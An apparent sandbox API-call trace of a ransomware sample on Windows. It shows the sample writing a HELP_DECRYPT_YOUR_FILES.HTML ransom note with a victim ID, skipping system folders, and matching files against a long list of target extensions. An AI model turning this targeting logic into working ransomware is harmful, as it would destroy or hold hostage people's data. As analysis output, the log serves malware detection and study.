	[0176.455] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18a834, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0) returned 0
	[0176.455] CloseHandle (hObject=0xffffffff) returned 1
	[0176.455] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.455] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.456] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.456] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0176.457] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.457] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.457] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff
	[0176.458] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.458] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18b248, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0) returned 0
	[0176.458] CloseHandle (hObject=0xffffffff) returned 1
	[0176.458] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\*.*" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0176.458] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\SmsRouter\\*.*") returned 42
	[0176.458] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.459] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\SmsRouter\\*.*", cchLength=0x2a | out: lpsz="c:\\users\\all users\\microsoft\\smsrouter\\*.*") returned 0x2a
	[0176.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="windows") returned 0x0
	[0176.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="boot") returned 0x0
	[0176.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="system volume information") returned 0x0
	[0176.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="temp") returned 0x0
	[0176.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="program files") returned 0x0
	[0176.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.461] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="appdata") returned 0x0
	[0176.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.461] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="application data") returned 0x0
	[0176.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.461] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="winnt") returned 0x0
	[0176.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.461] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="tmp") returned 0x0
	[0176.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.462] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="cache") returned 0x0
	[0176.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.462] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.462] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="webcache") returned 0x0
	[0176.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.463] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="inetcache") returned 0x0
	[0176.463] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.463] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="nvidia") returned 0x0
	[0176.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.471] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="packages") returned 0x0
	[0176.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.471] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="cookies") returned 0x0
	[0176.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.471] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\*.*", lpSrch="programdata") returned 0x0
	[0176.471] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0176.471] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0176.471] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0176.472] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0176.472] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MessageStore", cAlternateFileName="MESSAG~1")) returned 1
	[0176.472] lstrcmpW (lpString1="MessageStore", lpString2="..") returned 1
	[0176.472] lstrcmpW (lpString1="MessageStore", lpString2=".") returned 1
	[0176.472] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter"
	[0176.472] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\"
	[0176.472] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\", lpString2="MessageStore" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore"
	[0176.472] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore"
	[0176.473] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\"
	[0176.473] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\"
	[0176.473] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*.*") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*.*"
	[0176.473] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*.*" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0176.480] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*.*") returned 55
	[0176.480] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.480] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*") returned 0x37
	[0176.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.480] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="windows") returned 0x0
	[0176.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.481] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="boot") returned 0x0
	[0176.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.481] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="system volume information") returned 0x0
	[0176.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.481] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.482] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="temp") returned 0x0
	[0176.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.482] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="program files") returned 0x0
	[0176.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.482] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.482] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="appdata") returned 0x0
	[0176.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.483] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="application data") returned 0x0
	[0176.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.483] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="winnt") returned 0x0
	[0176.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.483] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="tmp") returned 0x0
	[0176.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.483] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="cache") returned 0x0
	[0176.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.484] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.484] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="webcache") returned 0x0
	[0176.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.484] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="inetcache") returned 0x0
	[0176.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.484] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="nvidia") returned 0x0
	[0176.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.485] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="packages") returned 0x0
	[0176.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.485] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="cookies") returned 0x0
	[0176.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.485] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="programdata") returned 0x0
	[0176.485] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0176.486] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x500dbf59, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb.chk", cAlternateFileName="")) returned 1
	[0176.486] lstrcmpW (lpString1="edb.chk", lpString2="..") returned 1
	[0176.486] lstrcmpW (lpString1="edb.chk", lpString2=".") returned 1
	[0176.486] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\"
	[0176.486] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\", lpString2="edb.chk" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb.chk") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb.chk"
	[0176.486] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb.chk") returned 59
	[0176.486] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.487] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb.chk", cchLength=0x3b | out: lpsz="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.chk") returned 0x3b
	[0176.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.487] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.chk", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.487] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.chk" | out: lpString1="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.chk") returned="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.chk"
	[0176.487] lstrlenW (lpString="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.chk") returned 59
	[0176.487] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.488] StrStrW (lpFirst=".chk", lpSrch=".") returned=".chk"
	[0176.488] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.488] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".chk") returned 0x0
	[0176.488] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x500dbf59, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb.log", cAlternateFileName="")) returned 1
	[0176.488] lstrcmpW (lpString1="edb.log", lpString2="..") returned 1
	[0176.488] lstrcmpW (lpString1="edb.log", lpString2=".") returned 1
